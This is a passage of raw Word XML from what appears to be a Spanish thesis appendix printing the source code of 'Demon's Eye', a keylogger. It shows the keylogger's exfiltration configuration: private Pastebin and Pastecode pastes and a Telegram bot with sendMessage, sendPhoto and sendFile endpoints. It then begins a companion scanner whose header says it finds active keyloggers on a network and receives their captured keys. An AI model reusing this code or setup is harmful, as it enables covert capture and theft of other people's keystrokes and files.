        <w:t xml:space="preserve">PASTEBIN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27   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTEBIN_POST_EXPIRE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'6M'                                     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># 6 Months</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">28   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTEBIN_PRIVATE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">2                                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># public = 0, unlisted = 1, private = 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">29   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">30   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Pastecode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">31   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTECODE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32   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTECODE_POST_URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'https://pastecode.xyz/api/create'         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Post url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">33   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTECODE_POST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34   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTECODE_POST_EXPIRE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">260000                                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># About 6 months (number of minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">35   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTECODE_PRIVATE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">1                                           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Paste is private</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">36   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">37   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Telegram Bot / Channel - Created with Bofather https://core.telegram.org/bots#3-how-do-i-create-a-bot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">38   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># http://t.me/DemonsEyebot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">39   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Info API https://core.telegram.org/bots/api</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">40   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># https://api.telegram.org/bot[BOT_API_KEY]/sendMessage?chat_id=[MY_CHANNEL_NAME]&amp;text=[MY_MESSAGE_TEXT]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">41   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT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42   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_NAME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'DemonsEye'                                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Name &gt; not used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">43   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_USERNAME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'@DemonsEyeKeylogger'                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Username &gt; not used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">44   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_CHANNELID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>= -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">1001185988695                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Important. Read docs folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">45   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_TOKEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">''                                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Important. Read docs folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">46   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'https://api.telegram.org/bot' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_TOKEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'/'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">47   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_GETME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'getMe'                                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># To get info about Bot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">48   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_UPDATES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'getUpdates'                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># To get channel updates &gt; not user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">49   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_SEND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'sendMessage'                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># To send a message to channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">50   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_SENDPHOTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'sendPhoto'                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># To send a photo to channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">51   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">TELEGRAM_BOT_SENDFILE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'sendFile'                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># To send a file to channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">52   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">53   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">54   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008772F3" w:rsidRDefault="008772F3">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00895583" w:rsidRDefault="00895583">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895583" w:rsidRDefault="00895583" w:rsidP="00BF3B1F">
      <w:pPr>
        <w:pStyle w:val="Titulo2NONUMERADO"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="DejaVu Sans" w:hAnsi="Arial" w:cs="DejaVu Sans"/>
          <w:kern w:val="3"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895583" w:rsidRDefault="00895583" w:rsidP="00BF3B1F">
      <w:pPr>
        <w:pStyle w:val="Titulo2NONUMERADO"/>
      </w:pPr>
      <w:bookmarkStart w:id="1232" w:name="_Toc19810123"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Código fuente del monitor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1232"/>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20079336"/>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demonseye-net-search.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">1    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">2    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">3    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">4    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># -----------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">5    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Name:             demonseye-net-search.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">6    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Purpose:          Search for possible active keyloggers in a network range.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">7    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#                   If the scanner finds a Demon's Eye Keylogger,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">8    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#                   a small server can be activated to receive the keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">9    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#                   Alternatively, it can be used as a normal network scanner, since it allows you to specify</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">10   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#                   which ports you want to check. It uses multithreading techniques so you can check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">11   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#                   65000 (rounding) computers in approximately 95 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">12   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">13   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Author:           Gabriel Marti Fuentes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">14   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># email:            gabimarti at gmail dot com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">15   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># GitHub:           https://github.com/gabimarti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">16   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Created:          29/07/2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">17   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># License:          GPLv3</w:t>
